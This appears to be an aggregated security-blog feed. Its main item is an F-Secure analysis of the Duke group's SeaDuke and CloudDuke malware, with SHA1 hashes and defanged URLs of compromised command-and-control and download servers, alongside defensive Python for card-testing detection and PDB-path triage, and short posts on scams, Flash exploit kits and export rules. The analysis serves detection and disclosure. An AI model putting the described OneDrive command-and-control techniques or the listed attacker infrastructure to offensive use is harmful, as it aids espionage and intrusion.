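            if len(cards) >= min_cards and rate >= min_decline_rate:
                if best is None or len(cards) > best["distinct_cards"]:
                    best = {"merchant": merchant, "bin": bin_,
                            "distinct_cards": len(cards), "decline_rate": rate,
                            "first_seen": win[0].ts.isoformat()}
        if best is not None:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_bin_attacks(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(alert)
```

The legitimate merchant m-2200 sees three different cards on the same BIN over an hour and is never flagged, while m-4411's eight cards in under a minute, seven of them declined, produce a single alert. In production the same grouping is usually also keyed by source IP or device fingerprint, and the small fixed amount (here 1.00) is a second strong signal worth scoring.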
Read MoreBusiness email compromise attacks have become increasingly common in recent years, driven by sophisticated social engineering tactics that make it easier to dupe victims. This is due in part to the believability that the threat actors are able to achieve by collecting sensitive information from publicly available sources, including corporate websites and social media. Criminals leverage this information to pose as trusted colleagues or business partners, using stolen or spoofed email accounts to deliver convincing messages that prompt recipients to transfer funds or disclose confidential information. The evolving nature of these schemes is characterized by their high success rate, low technological barriers to entry for threat actors, and the substantial financial losses incurred by victim organizations. Advancements in automation, AI-driven personalization, and ready-to-use phishing kits have further accelerated the proliferation of BEC attacks, creating a lucrative marketplace for cybercriminals.
Read MoreScammers, fraudsters, and phishers take advantage of every season. But the holiday shopping season - which includes Black Friday, Cyber Monday, and Christmas - may be their favorite.
As retailers rush to capitalize on what is generally their most profitable time of year, they will generally flood email boxes with great offers that are often time sensitive and may even seem too-good-to-be-true. Meanwhile, consumers also feel the urgency to get their shopping done, along with the stresses of work and family. Add in the financial pressure of an inflationary economy and the likelihood of making a quick mistake keeps increasing. Read on for some simple yet effective ways to ruin the scammers' fun as you celebrate the season of giving.
Read MoreOur "construction project" is progressing nicely.
And it should resolve this…
Fix mobile usability issues?
Translation: your site doesn't help us sell more Android phones and ads.
But whatever, the "issues" should be fixed soon enough.
On 18/08/15 At 12:52 PM
Read MoreRegular readers will have noticed it's been slow here of late.
Under Construction
We're finally undertaking an upgrade from Greymatter 1.7.3. This may be the world's oldest Greymatter blog… that will now change.
More info coming soon.
In the meantime, you can still catch us on Twitter.
On 13/08/15 At 01:25 PM
Read MoreAsk, and sometimes, you shall receive.
Last Friday, we wrote about call center scammers targeting iOS. And today, Apple released a new (beta) feature that should help.
Apple released iOS 9 Public Beta 2:
And it appears that one of Safari's new features allows people to block fraud-focused JavaScript.
We tested a scam-site and after a few attempts to dismiss the JavaScript dialog, Safari included a prompt to "Block Alerts". We were then easily able to close the page.
Kudos Apple! Looking forward to seeing this in iOS 9's general release.
Big hat tip to Rosyna Keller.
On 23/07/15 At 09:53 AM
Read MoreRecent weeks have seen the outing of two new additions to the Duke group's toolset, SeaDuke and CloudDuke. Of these, SeaDuke is a simple trojan made interesting by the fact that it's written in Python. And even more curiously, SeaDuke, with its built-in support for both Windows and Linux, is the first cross-platform malware we have observed from the Duke group. While SeaDuke is a single - albeit cross-platform - trojan, CloudDuke appears to be an entire toolset of malware components, or "solutions" as the Duke group apparently calls them. These components include a unique loader, a downloader, and not one but two different trojan components. CloudDuke also greatly expands on the Duke group's usage of cloud storage services, specifically Microsoft's OneDrive, as a channel for both command and control and the exfiltration of stolen data. Finally, some of the recent CloudDuke spear-phishing campaigns have borne a striking resemblance to CozyDuke spear-phishing campaigns from a year ago.
Linux support added with the cross-platform SeaDuke malware
Last week, both Symantec and Palo Alto Networks published research on SeaDuke, a newer addition to the arsenal of trojans being used by the Duke group. While older malware by the Duke group has always been written with a combination of the C and C++ programming languages as well as assembly language, SeaDuke is peculiarly written in Python with multiple layers of obfuscation. This Python code is usually then compiled into Windows executables using py2exe or pyinstaller. However, the Python code itself has been designed to work on both Windows and Linux. We therefore suspect that the Duke group is also using the same SeaDuke Python code to target Linux victims. This is the first time we have seen the Duke group employ malware to target Linux platforms.
An example of the cross-platform support found in SeaDuke.
A new set of solutions with the CloudDuke malware toolset
Last week, we also saw Palo Alto Networks and Kaspersky Lab publish research on malware components they respectively called MiniDionis and CloudLook. MiniDionis and CloudLook are both components of a larger malware toolset we call CloudDuke. This toolset consists of malware components that provide varying functionality while partially relying on a shared code framework and always using the same loader. Based on PDB strings found in the samples, the malware authors refer to the CloudDuke components as "solutions" with names such as "DropperSolution", "BastionSolution" and "OneDriveSolution". A list of PDB strings we have observed is below:
C:\DropperSolution\Droppers\Projects\Drop_v2\Release\Drop_v2.pdb
c:\BastionSolution\Shells\Projects\miniDionis4\miniDionis\obj\Release\miniDionis.pdb
c:\BastionSolution\Shells\Projects\miniDionis2\miniDionis\obj\Release\miniDionis.pdb
c:\OneDriveSolution\Shells\Projects\OneDrive2\OneDrive\obj\x64\Release\OneDrive.pdb
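As an added illustration (not code from F-Secure or from the original post), the Python triage below pulls CodeView RSDS records, and so PDB paths, straight out of a byte blob, extracts the "<Name>Solution" project names that the list above uses as a naming pattern, and checks for the archive magic that a SeaDuke-style Python build packed with pyinstaller would carry (the py2exe case is not covered). The byte scan deliberately does not walk the PE debug directory, so it also works on carved or memory-dumped fragments. The GUID, age and the two sample blobs are constructed test data, not real samples.

```python
import re
import struct
import uuid

# PyInstaller terminates its appended archive with a cookie that starts
# with this magic; a py2exe build would not carry it.
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"

# CloudDuke PDB paths look like <drive>:\<Name>Solution\...\<file>.pdb
SOLUTION_RE = re.compile(rb"[A-Za-z]:\\(\w+Solution)\\", re.IGNORECASE)


def extract_rsds_records(data: bytes):
    """Return (guid, age, pdb_path) for each CodeView RSDS record in data.

    Layout: b"RSDS" | 16-byte GUID (little-endian fields) | uint32 age |
    NUL-terminated PDB path. Chance hits on the four letters are dropped
    unless the trailing string ends in ".pdb".
    """
    records = []
    pos = data.find(b"RSDS")
    while pos != -1 and pos + 24 <= len(data):
        guid = uuid.UUID(bytes_le=data[pos + 4:pos + 20])
        (age,) = struct.unpack_from("<I", data, pos + 20)
        end = data.find(b"\x00", pos + 24)
        path = data[pos + 24:end if end != -1 else len(data)]
        if path.lower().endswith(b".pdb"):
            records.append((str(guid), age, path.decode("latin-1")))
        pos = data.find(b"RSDS", pos + 4)
    return records


def solution_names(data: bytes):
    """Distinct CloudDuke-style '<Name>Solution' project names in PDB paths."""
    names = set()
    for _, _, path in extract_rsds_records(data):
        for m in SOLUTION_RE.finditer(path.encode("latin-1")):
            names.add(m.group(1).decode("latin-1"))
    return sorted(names)


def has_pyinstaller_archive(data: bytes) -> bool:
    """True if the blob carries a PyInstaller archive cookie."""
    return PYINSTALLER_MAGIC in data


def make_rsds(path: bytes, guid="12345678-1234-5678-1234-567812345678", age=3):
    """Build a synthetic RSDS record (constructed test data, not a real sample)."""
    return b"RSDS" + uuid.UUID(guid).bytes_le + struct.pack("<I", age) + path + b"\x00"


# Constructed stand-ins for a CloudDuke BastionSolution build and a
# PyInstaller-packed SeaDuke build; neither contains real malware bytes.
SAMPLE_BASTION = (
    b"MZ" + b"\x90" * 64
    + make_rsds(rb"c:\BastionSolution\Shells\Projects\miniDionis4\miniDionis\obj\Release\miniDionis.pdb")
    + b"\x00" * 32
)
SAMPLE_SEADUKE = b"MZ" + b"\x90" * 64 + PYINSTALLER_MAGIC + b"\x00" * 32


def triage(data: bytes) -> dict:
    """Summarise the attribution hints the article relies on for one blob."""
    return {
        "pdb_paths": [p for _, _, p in extract_rsds_records(data)],
        "solutions": solution_names(data),
        "pyinstaller": has_pyinstaller_archive(data),
    }


if __name__ == "__main__":
    for name, blob in (("bastion", SAMPLE_BASTION), ("seaduke", SAMPLE_SEADUKE)):
        print(name, triage(blob))
```

PDB paths are attacker-controlled strings and trivially faked, so a hit is a pivot for clustering samples, not proof of authorship; the GUID and age pair is what lets you tie a binary to a specific symbol file when one turns up.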
The first of the CloudDuke components we have observed is a downloader internally called "DropperSolution". The purpose of the downloader is to download and execute additional malware on the victim's system. In most observed cases, the downloader will attempt to connect to a compromised website to download an encrypted malicious payload which the downloader will decrypt and execute. Depending on the way the downloader has been configured, in some cases it may first attempt to log in to Microsoft's cloud storage service OneDrive and retrieve the payload from there. If no payload is available from OneDrive, the downloader will revert to the previously mentioned method of downloading from compromised websites.
We have also observed two distinct trojan components in the CloudDuke toolset. The first of these, internally called "BastionSolution", is the trojan that Palo Alto Networks described in their research into "MiniDionis". Interestingly, BastionSolution appears to functionally be an exact copy of SeaDuke with the only real difference being the choice of programming language. BastionSolution also makes significant use of a code framework that is apparently internally called "Z". This framework provides classes for functionality such as encryption, compression, randomization and network communications.
A list of classes in the BastionSolution trojan, including multiple classes from the "Z" framework.
Classes from the same "Z" framework, such as the encryption and randomization classes, are also used by the second trojan component of the CloudDuke toolset. This second component, internally called "OneDriveSolution", is especially interesting because it relies on Microsoft's cloud storage service OneDrive as its command and control channel. To achieve this, OneDriveSolution will attempt to log into OneDrive with a preconfigured username and password. If successful, OneDriveSolution will then proceed to copy data from the victim's computer to the OneDrive account. It will also search the OneDrive account for files containing commands for the malware to execute.
A list of classes in the OneDriveSolution trojan, including multiple classes from the "Z" framework.
All of the CloudDuke "solutions" use the same loader, a piece of code whose primary purpose is to decrypt the embedded, encrypted solution, load it in memory and execute it. The Duke group has often employed loaders for their malware but unlike the previous loaders they have used, the CloudDuke loader is much more versatile with support for multiple methods of loading and executing the final payload as well as the ability to write to disk and execute additional malware components.
CloudDuke spear-phishing campaigns and similarities with CozyDuke
CloudDuke has recently been spread via spear-phishing emails with targets reportedly including organizations such as the US Department of Defense. These spear-phishing emails have contained links to compromised websites hosting zip archives that contain CloudDuke-laden executables. In most cases, executing these executables has resulted in two additional files being written to the victim's hard disk. The first of these files has been a decoy, such as an audio file or a PDF file, while the second has been a CloudDuke loader embedding a CloudDuke downloader, the so-called "DropperSolution". In these cases, the victim has been presented with the decoy file while in the background the downloader has proceeded to download and execute one of the CloudDuke trojans, "OneDriveSolution" or "BastionSolution".
Example of one of the decoy documents employed in the CloudDuke spear-phishing campaigns. It has apparently been copied by the attackers from here.
Interestingly, however, some of the other CloudDuke spear-phishing campaigns we have observed this July have borne a striking resemblance to CozyDuke spear-phishing campaigns seen almost exactly a year ago, in the beginning of July 2014. In both spear-phishing campaigns, the decoy document has been the exact same PDF file, a "US letter fax test page" (28d29c702fdf3c16f27b33f3e32687dd82185e8b). Similarly, the URLs hosting the malicious files have, in both campaigns, purported to be related to eFaxes. It is also interesting to note that in the case of the CozyDuke-inspired CloudDuke spear-phishing campaign, downloading and executing the malicious archive linked to in the emails has not resulted in the execution of the CloudDuke downloader but directly in the execution of the "BastionSolution" component, thereby skipping one step from the process described for the other CloudDuke spear-phishing campaigns.
The "US letter fax test page" decoy employed in both CloudDuke and CozyDuke spear-phishing campaigns.
Increasingly using cloud services to evade detection
CloudDuke is not the first time we have observed the Duke group use cloud services in general and Microsoft OneDrive specifically as part of their operations. Earlier this spring we released research on CozyDuke where we mentioned observing CozyDuke sometimes either directly use a OneDrive account to exfiltrate stolen data or alternatively CozyDuke downloading Visual Basic scripts that would copy stolen files to a OneDrive account and sometimes even retrieve files containing additional commands from the same OneDrive account.
In these previous cases the Duke group has only used OneDrive as a secondary communication channel but still relied on more traditional C&C channels for most of their actions. It is therefore interesting to note that CloudDuke actually enables the Duke group to rely solely on OneDrive for every step of their operation from downloading the actual trojan, passing commands to the trojan and finally exfiltrating stolen data.
By relying solely on third-party web services, such as OneDrive, as their command and control channel, we believe the Duke group is trying to better evade detection. Large amounts of data being transferred from an organization's network to an unknown web server easily raise suspicions. However, data being transferred to a popular cloud storage service is normal. What better way for an attacker to surreptitiously transfer large amounts of stolen data than the same way people transfer that same data every day for legitimate reasons? (Coincidentally, the implications of third-party web services being used as command and control channels are also the subject of an upcoming talk at the VirusBulletin 2015 conference.)
Directing limited resources towards evading detection and staying ahead of defenders
Developing even a single multipurpose malware toolset, never mind many, requires time and resources. Therefore it seems logical to attempt to reuse code such as supporting frameworks between different toolsets. The Duke group, however, appears to have taken this a step further with SeaDuke and the CloudDuke component BastionSolution, by rewriting the same code in multiple programming languages. This has the obvious benefit of saving time and resources while providing two malware toolsets that, while similar on the inside, appear completely different on the outside. This way, the discovery of one toolset does not immediately lead to the discovery of the second toolset.
The Duke group, long suspected of ties to the Russian state, has been running its espionage operation for an unusually long time and, especially lately, with unusual brazenness. These latest CloudDuke and SeaDuke campaigns appear to be a clear sign that the Dukes are not planning to stop any time soon.
Research and post by Artturi (@lehtior2)
F-Secure detects CloudDuke as Trojan:W32/CloudDuke.B and Trojan:W64/CloudDuke.B
Samples:
04299c0b549d4a46154e0a754dda2bc9e43dff76
2f53bfcd2016d506674d0a05852318f9e8188ee1
317bde14307d8777d613280546f47dd0ce54f95b
476099ea132bf16fa96a5f618cb44f87446e3b02
4800d67ea326e6d037198abd3d95f4ed59449313
52d44e936388b77a0afdb21b099cf83ed6cbaa6f
6a3c2ad9919ad09ef6cdffc80940286814a0aa2c
78fbdfa6ba2b1e3c8537be48d9efc0c47f417f3c
9f5b46ee0591d3f942ccaa9c950a8bff94aa7a0f
bfe26837da22f21451f0416aa9d241f98ff1c0f8
c16529dbc2987be3ac628b9b413106e5749999ed
cc15924d37e36060faa405e5fa8f6ca15a3cace2
dea6e89e36cf5a4a216e324983cc0b8f6c58eaa8
e33e6346da14931735e73f544949a57377c6b4a0
ed0cf362c0a9de96ce49c841aa55997b4777b326
f54f4e46f5f933a96650ca5123a4c41e115a9f61
f97c5e8d018207b1d546501fe2036adfbf774cfd
Compromised servers used for command and control:
hxxps://cognimuse.cs.ntua.gr/search.php
hxxps://portal.sbn.co.th/rss.php
hxxps://97.75.120.45/news/archive.php
hxxps://58.80.109.59/plugins/search.php
Compromised websites used to host CloudDuke:
hxxp://flockfilmseries.com/eFax/incoming/5442.ZIP
hxxp://www.recordsmanagementservices.com/eFax/incoming/150721/5442.ZIP
hxxp://files.counseling.org/eFax/incoming/150721/5442.ZIP
On 22/07/15 At 11:59 AM
VPRO (the Dutch public broadcasting organization) produced a 45-minute documentary about hacking and the trade of zero days. The documentary has now been released in English on YouTube.
The documentary features Charlie Miller, Joshua Corman, Katie Moussouris, Ronald Prins, Dan Tentler, Eric Rabe (of Hacking Team), Felix Lindner, Rodrigo Branco, Ben Nagy, The Grugq, and many others.
On 20/07/15 At 12:40 PM
The Telegraph published an article on Thursday about a scam targeting iOS users. Here's the gist: scammers are using JavaScript generated dialogs to display warnings of so-called "IOS Crash" reports prompting people to call for tech support. Near the end of the Telegraph's article, the following advice is offered:
"To prevent the issue happening again, go to Settings -> Safari -> Block Pop-ups."
Unfortunately, this advice is incorrect. And perhaps even more unfortunately, some security and tech pundits are now repeating the bad advice on numerous websites. How do we know the advice is wrong? Because we actually tested it…
First of all, this "IOS Crash Report" scam is a variation of the technical support scam, cases of which have been documented as early as 2008. In the past, cold-calls originated directly from call centers in India. But more recently, web-based lures are used to prompt potential victims into contacting the scammers.
A Google Search returns several live scam sites with this text:
"Due to a third party application in your phone, IOS is crashed."
Here's one of the sites as viewed with iOS Safari on an iPad:
Safari's "Fraudulent Website Warning" and "Block Pop-ups" features didn't prevent the page from loading.
What looks like a pop-up on the image above is actually a JavaScript generated dialog. One which will continuously re-spawn itself and can be very difficult to dismiss. Turning off JavaScript in Safari is the quickest way to regain control. Unfortunately, leaving JavaScript disabled will significantly impact a large number of legitimate websites.
Here's the same site as viewed with Google Chrome for Windows:
Notice the additional text in the image above: prevent this page from creating additional dialogs. Current versions of Chrome and Firefox (for Windows, at least) will inject this option into re-spawning dialogs, allowing the user to break the loop. Sadly, Internet Explorer and Safari do not. (We tested with IE for Windows / Windows Phone, and iOS Safari.)
Wouldn't it be great if all browsers supported this prevention feature?
Yeah, we think so, too.
But it's not just browsers, apps with browser functionality can also be affected.
Here's an example of a JavaScript dialog displayed via Cydia.
The end of the Telegraph's article included the following advice from City of London police:
"Never give your iCloud username and password or your bank details to someone over the phone."
Indeed! Giving somebody your iCloud password could quickly turn a support scam into a data hijacking and extortion scheme. We attempted to call several of the scammer telephone numbers to see if they would ask for our iCloud credentials — only to discover that the numbers we tried are currently not in service.
Hopefully they stay that way. (They won't.)
On 17/07/15 At 10:15 AM
After Hacking Team was compromised, a lot of information was publicly disclosed beginning on the 5th of July, particularly its business clients and a zero-day vulnerability for Adobe Flash Player that they had been using.
Since the info about the first zero-day was made freely available, we knew attackers would swiftly move to use it. As expected, the Flash exploit was integrated into exploit kits such as Angler, Magnitude, Nuclear, Neutrino, Rig, and HanJuan, as reported by Kafeine.
Based on our telemetry, there was a rise in Flash exploits beginning on the 6th that continued until the 9th.
Here are the stats for each exploit kit:
The security advisory for the CVE-2015-5119 zero-day was released on 7th July and the patch was made available on the 8th, so the hits started to decline about two days after the patch.
But just when people have started updating their systems, there was yet another spike from the Angler flash exploit hits:
Apparently, two more Flash vulnerabilities, CVE-2015-5122 and CVE-2015-5123, were discovered. These vulnerabilities are still waiting to be patched. According to Kafeine, one of the two vulnerabilities was added to the Angler exploit kit.
As a side note related to the Angler exploit kit: if you noticed in the second chart above, Angler and HanJuan share the same statistics. This was due to the fact that our detections for Angler Flash exploits were also hitting on HanJuan Flash exploits.
We verified this after discovering that a different URL pattern was being detected as Angler:
We looked at the flash exploit used by both kits, and the two are very much identical.
Angler Flash Exploit:
HanJuan Flash Exploit:
There were already speculations that there are strong connections between the actors behind the two exploit kits. For example, both have used "fileless" delivery of the payload and even similar encryption methods. Perhaps at some point we will see HanJuan supporting this new Flash 0-day as well.
In the meantime, since there hasn't been a patch out yet for these new ones, our users remain protected from the effects of the exploit kits through Browsing Protection as well as these detections:
Exploit:SWF/AnglerEK.L
Exploit:SWF/NeutrinoEK.C
Exploit:SWF/NeutrinoEK.D
Exploit:SWF/NuclearEK.H
Exploit:SWF/NuclearEK.J
Exploit:SWF/Salama.H
Exploit:SWF/Salama.R
Exploit:JS/AnglerEK.D
Exploit:JS/NuclearEK.I
Exploit:JS/MagnitudeEK.A
UPDATE: Adobe has released patches for the recent two vulnerabilities: CVE-2015-5122 and CVE-2015-5123. Users are recommended to update to the latest version of Adobe Flash Player.
On 13/07/15 At 12:29 PM
When hackers get hacked, that's when secrets are uncovered. On July 5th, Italian-based surveillance technology company Hacking Team was hacked. The hackers released a 400GB torrent file with internal documents, source code, and emails to the public - including the company's client list of close to 60 customers.
The list included countries such as Sudan, Kazakhstan and Saudi Arabia - despite official company denials of doing business with oppressive regimes. The leaked documents strongly implied that in the South-East Asian region, government agencies from Singapore, Thailand and Malaysia had purchased their most advanced spyware, referred to as a Remote Control System (RCS).
According to security researchers Citizen Lab, this spyware is extraordinarily intrusive, with the ability to turn on microphone and cameras on mobile devices, intercept Skype and instant messages, and use an anonymizer network of proxy servers to prevent harvested information from being traced back to the command and control servers.
Based on images of the client list posted to pastebin the software was purchased in Malaysia by the Malaysia Anti-Corruption Commission (MACC), Malaysia Intelligence (MI) and the Prime Minister's Office (PMO):
Additional images of leaked invoices posted to medium.com indicated the spyware was sold through a locally-based Malaysian company named Miliserv Technologies (M) Sdn Bhd (registered with the Ministry of Finance Malaysia), which specializes in providing digital forensics, intelligence gathering and public security services:
Why the Prime Minister's Office would need surveillance software remains puzzling. Mind you, professional grade spyware ain't cheap - a license upgrade could cost you MYR400,000 and maintenance renewal will set you back about MYR160,000.
According to reports of the incident in Malaysian alternative media, Malaysian government agencies have probably been using the spyware even before discovery of the FinFisher malware that was detected in the run-up to the 2013 General Elections.
Coincidentally, Malaysia has also been the frequent host of the annual ISS World Asia tradeshow, where companies promote their arsenal of 'lawful' surveillance software to law enforcement agencies, telco service providers and government employees. During the 2014 event, Hacking Team was present as the associate lead sponsor of the event.
MiliServ Technologies is currently involved in the upcoming 2015 ISS World Asia in Kuala Lumpur. The event is invitation-only, though it may be interesting to see if Hacking Team will make it there this year.
Post by – Su Gim
On 08/07/15 At 02:31 AM
The Wassenaar Arrangement, a multilateral export control regime, defines "intrusion software" as software specially designed or modified to avoid detection by monitoring tools, or to defeat protective countermeasures, of a computer or network capable device. Intrusion software is used to: extract data or information, or to modify system or user data; or to modify the standard execution path of a program or process in order to allow the execution of externally provided instructions.
Wassenaar states that monitoring tools are software or hardware devices that monitor system behaviours or processes running on a device. This includes antivirus (AV) products, end point security products, Personal Security Products (PSP), Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS) or firewalls.
(Source)
So… what we at F-Secure (and the rest of the antivirus industry) call "malware" appears to easily fit Wassenaar's definition of intrusion software.
Why is this interesting?
Well, the US Bureau of Industry and Security (BIS), part of the US Department of Commerce, has proposed updating its rules to require a license for the export of intrusion software.
And according to the Dept of Commerce, "an export" is any item that is sent from the United States to a foreign destination. "Items" include, among other things, software and technology.
The Paradox
So… if malware is intrusion software, and any item is an export, how exactly are US-based customers supposed to submit a malware sample to their European antivirus vendor? Seriously, customers send us zero-day-using malware all the time. Not to mention the samples that we routinely exchange with other trusted AV vendors from around the globe.
Unintended Consequences
The text associated with the BIS proposal says the scope includes penetration testing products that use intrusion software in what looks like an attempt to limit "hacking" tools, but there is nothing about what is excluded from the scope. So the BIS might not intend to limit customers from uploading malware samples to their AV vendor, but that could be the effect if this new rule is adopted and arbitrarily enforced. Or else it could just force people to operate in a legal limbo. Is that what we want?
The BIS is taking comments until July 20th.
On 09/06/15 At 01:25 PM
I visited the UK last Thursday, found a coffee shop offering "free" Wi-Fi, and read this…
"UK Law states that we must know who is using our Wi-Fi at all times."
Now I'm not a lawyer — but that seems like quite the disingenuous claim.
Mobile number, post code, and date of birth??
I wonder how many people fall for this type of malarkey.
Post by — @Sean
On 08/06/15 At 01:27 PM
There's an iOS vulnerability affecting iPhone, iPad, and even Apple Watch that allows for a denial of service.
Crashing a phone with an SMS? That's so 2008.
S60 SMS Exploit Messages
Unlike 2008, this time kids are reportedly using the vulnerability to harass others.
Apple is working on a security update. But unfortunately… that update very likely won't be available for older iPhones.
Updated to add:
Here's the "Effective Power" exploit crashing an iPhone 6:
Effective Power Unicode iOS hack on iPhone 6
And this… is Effective Power crashing the iOS Twitter app:
Effective Power Unicode iOS hack vs Twitter
On 28/05/15 At 01:56 PM
In the past few days, we received some cases from our customers in Italy and Spain regarding malicious spam e-mails that pointed to CryptoWall or CryptoLocker ransomware.
The spam e-mails pretended to come from a courier/postal service, regarding a parcel that was waiting to be collected. The e-mails offer a link to track that parcel online:
When we did the initial investigation of the e-mails from our standard test system, the link redirected to Google:
So, no malicious behavior? Well, we noted that the first two URLs pointed to PHP scripts. Since PHP code is executed on the server side, not locally on the client, it is possible that the servers were 'deciding' whether to redirect the user to Google or to serve malicious content, based on some preset conditions.
Since this particular spam e-mail is written in Italian - perhaps only a customer based in Italy would be able to see the malicious payload? Fortunately, we have Freedome, so we can travel to Italy for a little while to experiment.
So we turned on Freedome, set the location to Milan and clicked the link in the e-mail again:
Now we see the bad stuff. If the user is (or appears to be) located in Italy, the server will redirect them to a malicious file hosted on a cloud storage server.
The e-mail spam sent to Spanish users is similar, though in those cases, a CAPTCHA challenge is included to make the site seem more authentic. If the link in the e-mail is clicked by a user located outside Spain, again we end up in Google:
If the site is visited instead from a Spanish IP, we get to the CAPTCHA screen:
And then to the malware itself:
This spam campaign doesn't use any exploits (so far), just old-fashioned social engineering; infection only occurs if the user manually downloads and executes the files offered on the malicious URLs. For our customers, the URLs are blocked and the files are detected.
(malware SHA1s: 483be8273333c83d904bfa30165ef396fde99bf2, 295042c167b278733b10b8f7ba1cb939bff3cb38)
Post by — Victor
On 19/05/15 At 03:17 AM
Securing your SSH password is very important. Otherwise, you might be pwned by a little girl with her Raspberry Pi.
Don't worry, it's an authorized hack, she asked her mom for permission.
On 15/05/15 At 12:46 PM
The post Email Security Considerations for Microsoft 365 Users appeared first on GreatHorn.
The post Email Security Considerations for Google Workspace Users appeared first on GreatHorn.
The post Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates appeared first on GreatHorn.
The post Universities and Colleges Face Multi-faceted Email Security Challenges appeared first on GreatHorn.
The post Spam vs Phish: The Problem with User-Reported Phish Buttons appeared first on GreatHorn.
Bad actors around the globe go phishing in emails twenty-four hours a day, seven days a week. Whether they are “guppies” like your local bakery down the street or big “fish” like Google, no one is immune to their attacks. Google, one of the largest, most well-known – and used – applications, will always be […]
The post Phishing for Google Impersonation Attacks appeared first on GreatHorn.
GMX (Global Mail eXchange) Mail is an email service where users may register up to 10 individual email addresses at no cost. As a result, threat actors are leveraging this service to easily spin up new email addresses and effectively deliver phishing attacks that bypass Microsoft o365 and Google Workspace, landing in an organization’s email […]
The post GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes appeared first on GreatHorn.
The shift from on-premise email platforms to cloud email platforms has taken shape, with the majority (70%) of organizations. Microsoft 365 and Google Workspace remain the predominant email platforms for organizations. However, a significant change has occurred in the past year. With an estimated 40% of ransomware attacks that start through email, and BEC and […]
The post Native vs SEG vs ICES: What You Need to Know About Email Security appeared first on GreatHorn.
In cybersecurity, buzzwords come and go, often being replaced with new buzzwords while the market is still attempting to realize the benefits of the former. Today, every technology vendor is talking about Artificial Intelligence (AI). In reality, Machine Learning (the method to one day achieve AI) is still the predominant technical solution deployed within vendor […]
The post Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security appeared first on GreatHorn.
Our global supply chain includes all the people, companies and countries that need to work cohesively to manufacture, process and ship goods. Disruptions in the global supply chain are increasingly impacting organizations, with logistical problems crossing most industries. As a result, the continued strain on the supply chain puts added pressure on businesses as they […]
The post Global Supply Chain: Attackers Targeting Business Deliveries appeared first on GreatHorn.
Free software is everywhere, used for email, marketing, accounting, scheduling, and even storing customer data. For small businesses under pressure, it’s a tempting way to cut costs and stay afloat. But “free” often comes with strings. Many of these tools don’t offer strong security, putting your customers or clients at risk. What looks like a […]
The post The hidden price of free: How businesses’ cost-cutting tech choices compromise your security appeared first on Heimdal Security Blog.
Social engineering and AI-driven fraud are climbing to the top of global security concerns. The World Economic Forum lists them among the biggest cybersecurity threats of 2025. And the threat is no longer just spam emails with obvious typos. Today’s scams are targeted, convincing, and increasingly powered by artificial intelligence. We’re not just talking about phishing […]
The post The evolution of social engineering and the rise of AI-powered cybercrime appeared first on Heimdal Security Blog.
Welcome back to the MSP Security Playbook, the podcast that helps MSPs cut through the noise, eliminate inefficiencies, and build stronger, more profitable security businesses. I’m your host, Jacob Hazelbaker, business development representative at Heimdal Security, an industry-leading unified and AI-powered cybersecurity solutions provider. Today, I’m diving into a critical topic: the future of MSPs […]
The post MSPs in 2025: From “Break-Fix to Business Advisor” with Nigel Moore appeared first on Heimdal Security Blog.
COPENHAGEN, Denmark, May 21, 2025 – Heimdal launches a new podcast, The MSP Security Playbook – a show for managed service providers ready to scale smarter, boost profitability, and lead with next-gen cybersecurity solutions. The first episode features Nigel Moore, founder of The Tech Tribe, who discusses how MSPs can move beyond reactive IT support models and embrace more […]
The post Heimdal Launches New Podcast: The MSP Security Playbook appeared first on Heimdal Security Blog.
In NHS cybersecurity, one problem keeps security teams up at night: the gap between spotting issues and actually fixing them. If you work in healthcare IT, you know this headache all too well. Legacy systems that can’t be easily patched, security teams stretched too thin, and the constant balancing act of keeping operations running while […]
The post When Visibility Meets Action in NHS Cybersecurity appeared first on Heimdal Security Blog.
Since 2020, there has been a sharp rise in the number of cyberattacks targeting educational institutions. And PDF malware is one of the most common attack vectors. Through my work at Heimdal, I regularly speak with staff at universities, schools, and other educational institutions. While IT professionals are usually aware of the risks posed by […]
The post PDF Malware: How Educational Institutions Can Prevent Infection Spreading appeared first on Heimdal Security Blog.
The post NIS2 Compliance Checklist appeared first on Heimdal Security Blog.
The post EU Adopts New Cybersecurity Rules for Critical Infrastructure Under NIS2 Directive appeared first on Heimdal Security Blog.
The post NIS2 Compliance | Challenges, Pain Points and Solutions appeared first on Heimdal Security Blog.
The post NIS2 Compliance – How to Do It Sustainably by Continuous Compliance appeared first on Heimdal Security Blog.
The post How to Negotiate Your NIS2 Fine or Completely Avoid the Risk appeared first on Heimdal Security Blog.
The post How to Prepare for NIS2 Audits – A Compliance Expert’s View appeared first on Heimdal Security Blog.
The post 5 Best NIS2 Compliance Software and Solution Providers appeared first on Heimdal Security Blog.
The post Effective Privileged Access Management Implementation: A Step-by-Step Guide appeared first on Heimdal Security Blog.
The post Privileged Access Management (PAM) – PAM in the Cloud vs PAM for the Cloud appeared first on Heimdal Security Blog.
DShield honeypots [1] receive different types of attack traffic and the volume of that traffic can change over time. I've been collecting data from a half dozen honeypots for a little over a year to make comparisons. This data includes:
[This is a Guest Diary by Ehsaan Mavani, an ISC intern as part of the SANS.edu BACS program]
[This is a Guest Diary by Jennifer Wilson, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]
This is nothing "amazingly new", but more of a reminder to secure your "authorized_keys" file for SSH. One of the first things I see even simple bots do to obtain persistent access to a UNIX system is to add a key to the authorized_keys file of whatever account they are compromising.
Didier recently published several diaries related to steganography. I have to admit that steganography isn't exactly my favorite topic. It is one of those "neat" infosec toys, but its applicability is limited. Data exfiltration usually does not require proper steganography, but just appending data to an image will usually work just fine.
Check out the 25 new pieces of training content added in May, alongside the always fresh content update highlights, new features and events.
Cybersecurity experts are warning that scammers are taking advantage of uncertainty surrounding the U.S. administration’s tariff policies, CNBC reports.
Human risk management involves more than security awareness training, but training is a huge part of the mix.
I was once enrolled in a programming module back at university. We had been given a task, to code something, so we all sat banging out whatever code we could on our keyboards.
Since March 2025, the KnowBe4 Threat Labs team has observed a surge in phishing attacks that exploit Google’s AppSheet platform to launch a highly targeted, sophisticated campaign impersonating social media platform giant Meta.
